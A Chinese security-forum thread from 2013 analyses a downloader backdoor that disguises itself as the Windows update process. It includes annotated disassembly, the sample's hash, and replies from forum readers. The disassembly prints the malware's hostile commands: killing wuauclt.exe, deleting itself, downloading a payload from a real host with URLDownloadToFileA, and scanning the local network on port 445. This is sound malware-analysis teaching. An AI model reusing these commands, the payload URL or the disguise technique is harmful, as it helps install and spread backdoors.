分析一Backdoor
本帖最后由 JoyChou 于 2013-9-25 17:32 编辑//Author: JoyChou//Date: 2013年9月24日 23:37:23//Blog: http://www.cnblogs.com/Joy7/
病毒名称: Backdoor/Win32.Wuca.bj
病毒类型: 后门
文件 MD5: 2A1AEF106795864CA9DB643A116807DC
文件长度: 9,728 字节
感染系统: Windows98以上版本
加壳类型: UPX 0.89.6 - 1.02 / 1.05 - 1.24
开发工具: Microsoft Visual C++ 6.0
病毒执行过程:太懒,没有画图。运行样本过后,首先检测是否有当前进程,如果有就继续执行下面功能,没有就退出(当然又没做隐藏进程的手脚,双击了当然有),接着病毒提升自身权限然后判断当前进程的路径是否是"C:\WINDOWS\Fonts\wuauclt.exe"
如果不是:在C:\Windows下生成一个sa.exe目录,并且设置改目录属性为隐藏&&只读执行cmd命令cmd /c taskkill /im wuauclt.exe /f 结束wuauclt.exe进程(Wuauclt.exe是Windows自动升级管理程序,该进程会不断在线检测更新,删除该进程将使计算机无法得到最新更新信息),便以后的伪装复制当前样本到C:\WINDOWS\Fonts\wuauclt.exe 并设为隐藏属性(伪装为Windows自动升级管理程序)执行cmd命令 cmd /c del "C:\Documents and Settings\Administrator\桌面\1.exe"删除当前进程,达到隐密性退出程序 over
如果是(此时找到C:\WINDOWS\Fonts\wuauclt.exe文件,此时直接找是找不到的,利用文件搜索功能查找,并用od调试)加载系统动态库文件“urlmon.dll”,并调用该库里的"URLDownloadToFileA"函数,连接网络http://360.1s.fr/ps.jpg下载病毒文件并保存到C:\WINDOWS\Fonts\gern.fon目录下判断该目录文件是否存在,如果不存在则弹出一个消息框退出,如存在则创建多个线程,因为下载不成,线程里面很多的功能都不能实现。主要有设置创建启动项,运行一个远程溢出软件和一个svchost.exe文件
详细分析:没有vmp的upx直接用脱壳机脱掉
贴点代码
00402130 >/$55 push ebp
00402131|.8BEC mov ebp,esp
00402133|.81EC AC030000 sub esp,0x3AC
00402139|.53 push ebx
0040213A|.56 push esi
0040213B|.57 push edi
0040213C|.E8 3FF8FFFF call wuauclt.00401980 ;遍历进程
00402141|.85C0 test eax,eax
00402143|.74 08 je Xwuauclt.0040214D
00402145|.6A 00 push 0x0 ; /ExitCode = 0
00402147|.FF15 60304000 call dword ptr ds:[<&KERNEL32.ExitProces>; \ExitProcess
0040214D|>E8 7EF4FFFF call wuauclt.004015D0 ;提权
00402152|.8D85 54FCFFFF lea eax,
00402158|.68 04010000 push 0x104 ; /BufSize = 104 (260.)
0040215D|.50 push eax ; |PathBuffer
0040215E|.6A 00 push 0x0 ; |hModule = NULL
00402160|.FF15 5C304000 call dword ptr ds:[<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00402166|.8D8D 5CFEFFFF lea ecx,
0040216C|.68 04010000 push 0x104 ; /BufSize = 104 (260.)
00402171|.51 push ecx ; |Buffer
00402172|.FF15 7C304000 call dword ptr ds:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
00402178|.BF 047D4000 mov edi,wuauclt.00407D04 ;ASCII "\Fonts\wuauclt.exe"
0040217D|.83C9 FF or ecx,0xFFFFFFFF
00402180|.33C0 xor eax,eax
00402182|.8D95 5CFEFFFF lea edx, ;edx:C:\windows
00402188|.F2:AE repne scas byte ptr es:
0040218A|.F7D1 not ecx ;\Fonts\wuauclt.exe长度0x13
0040218C|.2BF9 sub edi,ecx
0040218E|.68 687F4000 push wuauclt.00407F68 ;ASCII "ont"
00402193|.8BF7 mov esi,edi
00402195|.8BD9 mov ebx,ecx
00402197|.8BFA mov edi,edx
00402199|.83C9 FF or ecx,0xFFFFFFFF
0040219C|.F2:AE repne scas byte ptr es:
0040219E|.8BCB mov ecx,ebx
004021A0|.4F dec edi
004021A1|.C1E9 02 shr ecx,0x2
004021A4|.F3:A5 rep movs dword ptr es:,dword ptr ds>
004021A6|.8BCB mov ecx,ebx
004021A8|.8D85 54FCFFFF lea eax,
004021AE|.83E1 03 and ecx,0x3
004021B1|.50 push eax
004021B2|.F3:A4 rep movs byte ptr es:,byte ptr ds:[>
004021B4|.E8 27030000 call wuauclt.004024E0
004021B9|.83C4 08 add esp,0x8
004021BC|.85C0 test eax,eax
004021BE|.0F84 DA010000 je wuauclt.0040239E
004021C4|.33C9 xor ecx,ecx
004021C6|.8D55 EC lea edx,
004021C9|.894D ED mov dword ptr ss:,ecx
004021CC|.52 push edx
004021CD|.894D F1 mov dword ptr ss:,ecx
004021D0|.68 B87D4000 push wuauclt.00407DB8 ;ASCII "khbced$Zbb"
004021D5|.894D F5 mov dword ptr ss:,ecx
004021D8|.C645 EC 00 mov byte ptr ss:,0x0
004021DC|.894D F9 mov dword ptr ss:,ecx
004021DF|.66:894D FD mov word ptr ss:,cx
004021E3|.884D FF mov byte ptr ss:,cl
004021E6|.E8 25F1FFFF call wuauclt.00401310 ;字符串解密
004021EB|.83C4 08 add esp,0x8
004021EE|.90 nop
004021EF|.90 nop
004021F0|.90 nop
004021F1|.90 nop
004021F2|.90 nop
004021F3|.90 nop
004021F4|.90 nop
004021F5|.90 nop
004021F6|.90 nop
004021F7|.90 nop
004021F8|.90 nop
004021F9|.90 nop
004021FA|.90 nop
004021FB|.90 nop
004021FC|.90 nop
004021FD|.90 nop
004021FE|.90 nop
004021FF|.90 nop
00402200|.90 nop
00402201|.90 nop
00402202|.90 nop
00402203|.90 nop
00402204|.90 nop
00402205|.90 nop
00402206|.90 nop
00402207|.90 nop
00402208|.90 nop
00402209|.90 nop
0040220A|.90 nop
0040220B|.90 nop
0040220C|.90 nop
0040220D|.90 nop
0040220E|.90 nop
0040220F|.90 nop
00402210|.90 nop
00402211|.90 nop
00402212|.90 nop
00402213|.90 nop
00402214|.90 nop
00402215|.90 nop
00402216|.8D45 EC lea eax,
00402219|.50 push eax ; /FileName
0040221A|.FF15 38304000 call dword ptr ds:[<&KERNEL32.LoadLibrar>; \LoadLibraryA
00402220|.8BD8 mov ebx,eax
00402222|.B9 09000000 mov ecx,0x9
00402227|.33C0 xor eax,eax
00402229|.8D7D C5 lea edi,dword ptr ss:
0040222C|.C645 C4 00 mov byte ptr ss:,0x0
00402230|.C685 60FFFFFF>mov byte ptr ss:,0x0
00402237|.F3:AB rep stos dword ptr es:
00402239|.66:AB stos word ptr es:
0040223B|.AA stos byte ptr es:
0040223C|.B9 18000000 mov ecx,0x18
00402241|.33C0 xor eax,eax
00402243|.8DBD 61FFFFFF lea edi,dword ptr ss:
00402249|.F3:AB rep stos dword ptr es:
0040224B|.66:AB stos word ptr es:
0040224D|.8D4D C4 lea ecx,
00402250|.51 push ecx
00402251|.68 A47D4000 push wuauclt.00407DA4 ;ASCII "KHB:emdbeWZJe<_b[7"
00402256|.AA stos byte ptr es:
00402257|.E8 B4F0FFFF call wuauclt.00401310
0040225C|.83C4 08 add esp,0x8
0040225F|.8D55 C4 lea edx,
00402262|.52 push edx ; /URLDownloadToFileA
00402263|.53 push ebx ; |urlmon.dll
00402264|.FF15 34304000 call dword ptr ds:[<&KERNEL32.GetProcAdd>; \GetProcAddress
0040226A|.A3 D88C4000 mov dword ptr ds:,eax
0040226F|.8D85 58FDFFFF lea eax,
00402275|.68 04010000 push 0x104 ; /BufSize = 104 (260.)
0040227A|.50 push eax ; |Buffer
0040227B|.FF15 7C304000 call dword ptr ds:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
00402281|.BF D47C4000 mov edi,wuauclt.00407CD4 ;ASCII "\Fonts\gern.fon"
00402286|.83C9 FF or ecx,0xFFFFFFFF
00402289|.33C0 xor eax,eax
0040228B|.8D95 58FDFFFF lea edx,
00402291|.F2:AE repne scas byte ptr es:
00402293|.F7D1 not ecx
00402295|.2BF9 sub edi,ecx
00402297|.8BF7 mov esi,edi
00402299|.8BFA mov edi,edx
0040229B|.8BD1 mov edx,ecx
0040229D|.83C9 FF or ecx,0xFFFFFFFF
004022A0|.F2:AE repne scas byte ptr es:
004022A2|.8BCA mov ecx,edx
004022A4|.4F dec edi
004022A5|.C1E9 02 shr ecx,0x2
004022A8|.F3:A5 rep movs dword ptr es:,dword ptr ds>
004022AA|.8BCA mov ecx,edx
004022AC|.8D85 60FFFFFF lea eax,
004022B2|.83E1 03 and ecx,0x3
004022B5|.50 push eax
004022B6|.F3:A4 rep movs byte ptr es:,byte ptr ds:[>
004022B8|.68 507F4000 push wuauclt.00407F50 ;ASCII "^jjf0%%),&$'i$\h%fi$`f]"
004022BD|.E8 4EF0FFFF call wuauclt.00401310 ;http://360.1s.fr/ps.jpg
004022C2|.83C4 08 add esp,0x8
004022C5|.8D8D 58FDFFFF lea ecx,
004022CB|.8D95 60FFFFFF lea edx,
004022D1|.6A 00 push 0x0
004022D3|.6A 00 push 0x0
004022D5|.51 push ecx ;C:\WINDOWS\Fonts\gern.fon
004022D6|.52 push edx ;http://360.1s.fr/ps.jpg
004022D7|.6A 00 push 0x0
004022D9|.FF15 D88C4000 call dword ptr ds:
004022DF 68 10270000 push 0x2710
004022E4|.FF15 88304000 call dword ptr ds:[<&KERNEL32.Sleep>] ; \Sleep
004022EA|.53 push ebx ; /hLibModule
004022EB|.FF15 30304000 call dword ptr ds:[<&KERNEL32.FreeLibrar>; \FreeLibrary
004022F1|.8D85 58FDFFFF lea eax,
004022F7|.50 push eax ; /FileName
004022F8|.FF15 2C304000 call dword ptr ds:[<&KERNEL32.GetFileAtt>; \GetFileAttributesA
004022FE|.83F8 FF cmp eax,-0x1
00402301|.6A 00 push 0x0 ; /Style = MB_OK|MB_APPLMODAL
00402303|.75 1E jnz Xwuauclt.00402323 ; |
00402305|.68 487F4000 push wuauclt.00407F48 ; |Title = "http"
0040230A|.68 3C7F4000 push wuauclt.00407F3C ; |Text = "qq935623508"
0040230F 6A FF push -0x1
00402311|.FF15 B0304000 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA
00402317|.5F pop edi
00402318|.5E pop esi
00402319|.B8 01000000 mov eax,0x1
0040231E|.5B pop ebx
0040231F|.8BE5 mov esp,ebp
00402321|.5D pop ebp
00402322|.C3 retn
00402323|>8B35 58304000 mov esi,dword ptr ds:[<&KERNEL32.CreateT>; |kernel32.CreateThread
00402329|.6A 00 push 0x0 ; |CreationFlags = 0
0040232B|.6A 00 push 0x0 ; |pThreadParm = NULL
0040232D|.68 801F4000 push wuauclt.00401F80 ; |ThreadFunction = wuauclt.00401F80
00402332|.6A 00 push 0x0 ; |StackSize = 0
00402334|.6A 00 push 0x0 ; |pSecurity = NULL
00402336|.FFD6 call esi ; \CreateThread
00402338|.6A 00 push 0x0 ; /pThreadId = NULL
0040233A|.6A 00 push 0x0 ; |CreationFlags = 0
0040233C|.6A 00 push 0x0 ; |pThreadParm = NULL
0040233E|.68 301C4000 push wuauclt.00401C30 ; |ThreadFunction = wuauclt.00401C30
00402343|.6A 00 push 0x0 ; |StackSize = 0
00402345|.6A 00 push 0x0 ; |pSecurity = NULL
00402347|.FFD6 call esi ; \CreateThread
00402349|.6A 00 push 0x0 ; /pThreadId = NULL
0040234B|.6A 00 push 0x0 ; |CreationFlags = 0
0040234D|.6A 00 push 0x0 ; |pThreadParm = NULL
0040234F|.68 F0194000 push wuauclt.004019F0 ; |ThreadFunction = wuauclt.004019F0
00402354|.6A 00 push 0x0 ; |StackSize = 0
00402356|.6A 00 push 0x0 ; |pSecurity = NULL
00402358|.FFD6 call esi ; \CreateThread
0040235A|.6A 00 push 0x0 ; /pThreadId = NULL
0040235C|.6A 00 push 0x0 ; |CreationFlags = 0
0040235E|.6A 00 push 0x0 ; |pThreadParm = NULL
00402360|.68 40164000 push wuauclt.00401640 ; |ThreadFunction = wuauclt.00401640
00402365|.6A 00 push 0x0 ; |StackSize = 0
00402367|.6A 00 push 0x0 ; |pSecurity = NULL
00402369|.FFD6 call esi ; \CreateThread
0040236B|.6A 00 push 0x0 ; /pThreadId = NULL
0040236D|.6A 00 push 0x0 ; |CreationFlags = 0
0040236F|.6A 00 push 0x0 ; |pThreadParm = NULL
00402371|.68 50174000 push wuauclt.00401750 ; |ThreadFunction = wuauclt.00401750
00402376|.6A 00 push 0x0 ; |StackSize = 0
00402378|.6A 00 push 0x0 ; |pSecurity = NULL
0040237A|.FFD6 call esi ; \CreateThread
0040237C|.6A 00 push 0x0 ; /pThreadId = NULL
0040237E|.6A 00 push 0x0 ; |CreationFlags = 0
00402380|.6A 00 push 0x0 ; |pThreadParm = NULL
00402382|.68 701D4000 push wuauclt.00401D70 ; |ThreadFunction = wuauclt.00401D70
00402387|.6A 00 push 0x0 ; |StackSize = 0
00402389|.6A 00 push 0x0 ; |pSecurity = NULL
0040238B|.FFD6 call esi ; \CreateThread
0040238D|.E8 CEF2FFFF call wuauclt.00401660 ;设置启动项
00402392|.5F pop edi
00402393|.5E pop esi
00402394|.B8 01000000 mov eax,0x1
00402399|.5B pop ebx
0040239A|.8BE5 mov esp,ebp
0040239C|.5D pop ebp
0040239D|.C3 retn
0040239E|>68 307F4000 push wuauclt.00407F30 ;ASCII "C:\sa.exe"
004023A3|.E8 4E020000 call wuauclt.004025F6 ;创建目录
004023A8|.8B35 88304000 mov esi,dword ptr ds:[<&KERNEL32.Sleep>] ;kernel32.Sleep
004023AE|.83C4 04 add esp,0x4
004023B1|.6A 64 push 0x64 ; /Timeout = 100. ms
004023B3|.FFD6 call esi ; \Sleep
004023B5|.6A 03 push 0x3 ; /FileAttributes = READONLY|HIDDEN
004023B7|.68 307F4000 push wuauclt.00407F30 ; |FileName = "C:\sa.exe"
004023BC|.FF15 9C304000 call dword ptr ds:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA
004023C2|.8B1D 28304000 mov ebx,dword ptr ds:[<&KERNEL32.WinExec>;kernel32.WinExec
004023C8|.6A 00 push 0x0 ; /ShowState = SW_HIDE
004023CA|.68 0C7F4000 push wuauclt.00407F0C ; |CmdLine = "cmd /c taskkill /im wuauclt.exe /f"
004023CF|.FFD3 call ebx ; \WinExec
004023D1|.68 D0070000 push 0x7D0 ; /Timeout = 2000. ms
004023D6|.FFD6 call esi ; \Sleep
004023D8|.8D8D 5CFEFFFF lea ecx,
004023DE|.6A 00 push 0x0 ; /FailIfExists = FALSE
004023E0|.8D95 54FCFFFF lea edx, ; |
004023E6|.51 push ecx ; |NewFileName
004023E7|.52 push edx ; |ExistingFileName
004023E8|.FF15 50304000 call dword ptr ds:[<&KERNEL32.CopyFileA>>; \CopyFileA
004023EE|.68 A00F0000 push 0xFA0 ; /Timeout = 4000. ms
004023F3|.FFD6 call esi ; \Sleep
004023F5|.8D85 5CFEFFFF lea eax,
004023FB|.6A 00 push 0x0 ; /ShowState = SW_HIDE
004023FD|.50 push eax ; |CmdLine
004023FE|.FFD3 call ebx ; \WinExec
00402400|.B9 18000000 mov ecx,0x18
00402405|.33C0 xor eax,eax
00402407|.8DBD 61FFFFFF lea edi,dword ptr ss:
0040240D|.C685 60FFFFFF>mov byte ptr ss:,0x0
00402414|.F3:AB rep stos dword ptr es:
00402416|.66:AB stos word ptr es:
00402418|.AA stos byte ptr es:
00402419|.BF 007F4000 mov edi,wuauclt.00407F00 ;ASCII "cmd /c del "
0040241E|.83C9 FF or ecx,0xFFFFFFFF
00402421|.33C0 xor eax,eax
00402423|.8D95 60FFFFFF lea edx,
00402429|.F2:AE repne scas byte ptr es:
0040242B|.F7D1 not ecx
0040242D|.2BF9 sub edi,ecx
0040242F|.8BC1 mov eax,ecx
00402431|.8BF7 mov esi,edi
00402433|.8BFA mov edi,edx
00402435|.C1E9 02 shr ecx,0x2
00402438|.F3:A5 rep movs dword ptr es:,dword ptr ds>
0040243A|.8BC8 mov ecx,eax
0040243C|.83E1 03 and ecx,0x3
0040243F|.F3:A4 rep movs byte ptr es:,byte ptr ds:[>
00402441|.FF15 4C304000 call dword ptr ds:[<&KERNEL32.GetCommand>; [GetCommandLineA
00402447|.8BF8 mov edi,eax
00402449|.83C9 FF or ecx,0xFFFFFFFF
0040244C|.33C0 xor eax,eax
0040244E|.8D95 60FFFFFF lea edx,
00402454|.F2:AE repne scas byte ptr es:
00402456|.F7D1 not ecx
00402458|.2BF9 sub edi,ecx
0040245A|.50 push eax ; /ShowState => SW_HIDE
0040245B|.8BF7 mov esi,edi ; |
0040245D|.8BFA mov edi,edx ; |
0040245F|.8BD1 mov edx,ecx ; |
00402461|.83C9 FF or ecx,0xFFFFFFFF ; |
00402464|.F2:AE repne scas byte ptr es: ; |
00402466|.8BCA mov ecx,edx ; |
00402468|.4F dec edi ; |
00402469|.C1E9 02 shr ecx,0x2 ; |
0040246C|.F3:A5 rep movs dword ptr es:,dword ptr ds>; |
0040246E|.8BCA mov ecx,edx ; |
00402470|.8D85 60FFFFFF lea eax, ; |
00402476|.83E1 03 and ecx,0x3 ; |
00402479|.50 push eax ; |CmdLine
0040247A|.F3:A4 rep movs byte ptr es:,byte ptr ds:[>; |
0040247C|.FFD3 call ebx ; \WinExec
0040247E|.6A 00 push 0x0 ; /ExitCode = 0
00402480\.FF15 60304000 call dword ptr ds:[<&KERNEL32.ExitProces>; \ExitProcess
401d70一个重要的线程回调函数
通过获取主机名再获取主机ip
00401D7E|.8D85 FCFAFFFF lea eax,
00401D84|.50 push eax ; /pWSAData
00401D85|.6A 02 push 0x2 ; |RequestedVersion = 2 (2.0.)
00401D87|.E8 34070000 call <jmp.&WS2_32.#115> ; \WSAStartup
00401D8C|.85C0 test eax,eax
00401D8E|.0F85 DA010000 jnz wuauclt.00401F6E
00401D94|.53 push ebx
00401D95|.56 push esi
00401D96|.57 push edi
00401D97|.8D8D 94FEFFFF lea ecx,
00401D9D|.68 FF000000 push 0xFF ; /BufSize = FF (255.)
00401DA2|.51 push ecx ; |Buffer
00401DA3|.E8 30070000 call <jmp.&WS2_32.#57> ; \gethostname
00401DA8|.85C0 test eax,eax
00401DAA|.0F85 AB010000 jnz wuauclt.00401F5B
00401DB0|.8D95 94FEFFFF lea edx,
00401DB6|.52 push edx ; /Name
00401DB7|.E8 16070000 call <jmp.&WS2_32.#52> ; \gethostbyname
00401DBC|.85C0 test eax,eax
00401DBE|.8945 F8 mov ,eax
类似代码
#include "StdAfx.h"
#include <stdio.h>
#include <windows.h>
#include <winSock2.H>
#pragma comment(lib, "WS2_32.lib") // 必须在头文件下面,否则报错
void main()
{
WORD wVersionRequested;//版本号
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD(2, 2);//2.2版本的套接字
//加载套接字库,如果失败返回
err = WSAStartup(wVersionRequested, &wsaData); //必须要加载套接字库
if (err != 0)
{
return;
}
//判断高低字节是不是2,如果不是2.2的版本则退出
if (LOBYTE(wsaData.wVersion) != 2 ||
HIBYTE(wsaData.wVersion) != 2)
{
return;
}
char hostname = {0};
gethostname(hostname, sizeof(hostname)); // 获取主机名
printf("%s\n", hostname);
PHOSTENT hostinfo;
char *ip = NULL;
if((hostinfo = gethostbyname(hostname)) != NULL) // 根据主机名获取主机信息
{
int nCount = 0;
while(hostinfo->h_addr_list)
{
ip = inet_ntoa (*(struct in_addr *)hostinfo->h_addr_list);
printf("IP #%d: %s\n", ++nCount, ip);
}
}
WSACleanup();
fflush(stdin);
getchar();
return ;
}
192.168.160是我本机ip的前24位,循环256次,当然能循环到我的ip(不过为什么不直接获取32位ip呢 T_T~。)
初始化套接字,作为客服端依次连接192.168.160.0(最后一位依次加1,循环256次)
没有连接成功就执行后门explorer.exe程序,由此可见后门是一个服务端程序。
00401EB1|.C745 FC 00000>mov ,0x0
00401EB8|>8B45 F8 /mov eax,
00401EBB|.8B48 0C |mov ecx,dword ptr ds:
00401EBE|.8B11 |mov edx,dword ptr ds:
00401EC0|.8A4D FC |mov cl,byte ptr ss:
00401EC3|.884A 03 |mov byte ptr ds:,cl
00401EC6|.8B50 0C |mov edx,dword ptr ds:
00401EC9|.8B02 |mov eax,dword ptr ds:
00401ECB|.8B08 |mov ecx,dword ptr ds:
00401ECD|.51 |push ecx ; /in_addr
00401ECE|.E8 F9050000 |call <jmp.&WS2_32.#12> ; \inet_ntoa
00401ED3|.8BD8 |mov ebx,eax
00401ED5|.53 |push ebx
00401ED6|.E8 C5FCFFFF |call wuauclt.00401BA0 ;初始化套接字,作为客服端依次连接192.168.160.0(最后一位依次加1,循环256次)
00401EDB|.83C4 04 |add esp,0x4
00401EDE|.84C0 |test al,al
00401EE0|.74 67 |je Xwuauclt.00401F49 ; 连接成功就跳转
00401EE2|.BF 547E4000 |mov edi,wuauclt.00407E54
00401EE7|.83C9 FF |or ecx,0xFFFFFFFF
00401EEA|.33C0 |xor eax,eax
00401EEC|.F2:AE |repne scas byte ptr es:
00401EEE|.F7D1 |not ecx
00401EF0|.2BF9 |sub edi,ecx
00401EF2|.50 |push eax ; /IsShown => 0
00401EF3|.8BF7 |mov esi,edi ; |
00401EF5|.8BD1 |mov edx,ecx ; |
00401EF7|.8BFB |mov edi,ebx ; |
00401EF9|.83C9 FF |or ecx,0xFFFFFFFF ; |
00401EFC|.F2:AE |repne scas byte ptr es: ; |
00401EFE|.8BCA |mov ecx,edx ; |
00401F00|.4F |dec edi ; |
00401F01|.C1E9 02 |shr ecx,0x2 ; |
00401F04|.F3:A5 |rep movs dword ptr es:,dword ptr d>; |
00401F06|.8BCA |mov ecx,edx ; |
00401F08|.50 |push eax ; |DefDir => NULL
00401F09|.83E1 03 |and ecx,0x3 ; |
00401F0C|.53 |push ebx ; |Parameters
00401F0D|.F3:A4 |rep movs byte ptr es:,byte ptr ds:>; |
00401F0F|.8D7D 94 |lea edi, ; |
00401F12|.83C9 FF |or ecx,0xFFFFFFFF ; |
00401F15|.F2:AE |repne scas byte ptr es: ; |
00401F17|.F7D1 |not ecx ; |
00401F19|.2BF9 |sub edi,ecx ; |
00401F1B|.8BF7 |mov esi,edi ; |
00401F1D|.8BD1 |mov edx,ecx ; |
00401F1F|.8BFB |mov edi,ebx ; |
00401F21|.83C9 FF |or ecx,0xFFFFFFFF ; |
00401F24|.F2:AE |repne scas byte ptr es: ; |
00401F26|.8BCA |mov ecx,edx ; |
00401F28|.4F |dec edi ; |
00401F29|.C1E9 02 |shr ecx,0x2 ; |
00401F2C|.F3:A5 |rep movs dword ptr es:,dword ptr d>; |
00401F2E|.8BCA |mov ecx,edx ; |
00401F30|.8D85 90FDFFFF |lea eax, ; |
00401F36|.83E1 03 |and ecx,0x3 ; |
00401F39|.50 |push eax ; |FileName
00401F3A|.68 C47D4000 |push wuauclt.00407DC4 ; |Operation = "open"
00401F3F|.6A 00 |push 0x0 ; |hWnd = NULL
00401F41|.F3:A4 |rep movs byte ptr es:,byte ptr ds:>; |
00401F43|.FF15 A8304000 |call dword ptr ds:[<&SHELL32.ShellExecu>; \ShellExecuteA//执行后门
00401F49|>8B45 FC |mov eax,
00401F4C|.40 |inc eax
00401F4D|.3D 00010000 |cmp eax,0x100 ;循环次数16*16为256次,0到255
00401F52|.8945 FC |mov ,eax
00401F55|.^ 0F8C 5DFFFFFF \jl wuauclt.00401EB8
00401F5B|>E8 66050000 call <jmp.&WS2_32.#116> ; [WSACleanup
初始化套接字00401ED6call00401BA0
00401BA0/$81EC A0010000 sub esp,0x1A0
00401BA6|.8D4424 10 lea eax,dword ptr ss:
00401BAA|.56 push esi
00401BAB|.50 push eax ; /pWSAData
00401BAC|.68 01010000 push 0x101 ; |RequestedVersion = 101 (1.1.)
00401BB1|.E8 0A090000 call <jmp.&WS2_32.#115> ; \WSAStartup
00401BB6|.85C0 test eax,eax
00401BB8|.74 0A je Xwuauclt.00401BC4
00401BBA|.32C0 xor al,al
00401BBC|.5E pop esi
00401BBD|.81C4 A0010000 add esp,0x1A0
00401BC3|.C3 retn
00401BC4|>6A 06 push 0x6 ; /Protocol = IPPROTO_TCP
00401BC6|.6A 01 push 0x1 ; |Type = SOCK_STREAM
00401BC8|.6A 02 push 0x2 ; |Family = AF_INET
00401BCA|.E8 EB080000 call <jmp.&WS2_32.#23> ; \socket
00401BCF|.8BF0 mov esi,eax
00401BD1|.83FE FF cmp esi,-0x1
00401BD4|.75 10 jnz Xwuauclt.00401BE6
00401BD6|.50 push eax ; /Socket
00401BD7|.E8 D8080000 call <jmp.&WS2_32.#3> ; \closesocket
00401BDC|.32C0 xor al,al
00401BDE|.5E pop esi
00401BDF|.81C4 A0010000 add esp,0x1A0
00401BE5|.C3 retn
00401BE6|>8B8C24 A80100>mov ecx,dword ptr ss:
00401BED|.66:C74424 04 >mov word ptr ss:,0x2
00401BF4|.51 push ecx ; /pAddr
00401BF5|.E8 B4080000 call <jmp.&WS2_32.#11> ; \inet_addr
00401BFA|.68 BD010000 push 0x1BD ; /NetShort = 1BD
00401BFF|.894424 0C mov dword ptr ss:,eax ; |
00401C03|.E8 A0080000 call <jmp.&WS2_32.#9> ; \ntohs
00401C08|.8D5424 04 lea edx,dword ptr ss:
00401C0C|.6A 10 push 0x10 ; /AddrLen = 10 (16.)
00401C0E|.52 push edx ; |pSockAddr
00401C0F|.56 push esi ; |Socket
00401C10|.66:894424 12mov word ptr ss:,ax ; |
00401C15|.E8 88080000 call <jmp.&WS2_32.#4> ; \connect
00401C1A|.85C0 test eax,eax ;连接成功返回0
00401C1C|.0F94C0 sete al ;al成功为0
00401C1F|.5E pop esi
00401C20|.81C4 A0010000 add esp,0x1A0
00401C26\.C3 retn
简单的总结下:C:\WINDOWS\Fonts\gern.fon文件就是一个XX.INI文件,利用GetPrivateProfileStringA 获取文件内容,该文件存在各种URL下载链接,以及各种充当比较功能的字符串。explorer.exeJ就是后门程序。远程溢出的一个比较老的exp
PS:一个下载者后门,还是比较简单,重要的是把流程分析清楚,这样才不会在api中迷失。适合想分析病毒的new hand,基本都是api,以前分析过的,今天无意看到,分享一下。确实太多功能都不能实现,分析得确实比较蛋疼。能力强点建议试着玩玩强点的毒。
贴图比较麻烦,所以放文档了,什么时候DZ也可以直接复制图片进去T_T~~ 详细看idb和文档吧。
附件:
附件已下载努力学习中
谢谢分享 wgz001 发表于 2013-9-25 08:50 static/image/common/back.gif
附件已下载努力学习中
好好学习,天天向上。
本帖最后由 L4Nce 于 2013-9-25 12:38 编辑
我什么时候才有能力能像jc师傅一样开始分析病毒呀,伤不起
肥皂已扔
不错 学习了 好好学习,天天向上。
提权那一点有点不明白,LZ能说一下吗? niklaus520 发表于 2014-1-4 16:14 static/image/common/back.gif
提权那一点有点不明白,LZ能说一下吗?
进程提权?
JoyChou 发表于 2014-1-4 16:32 static/image/common/back.gif
进程提权?
嗯,对的
页:
[1]
2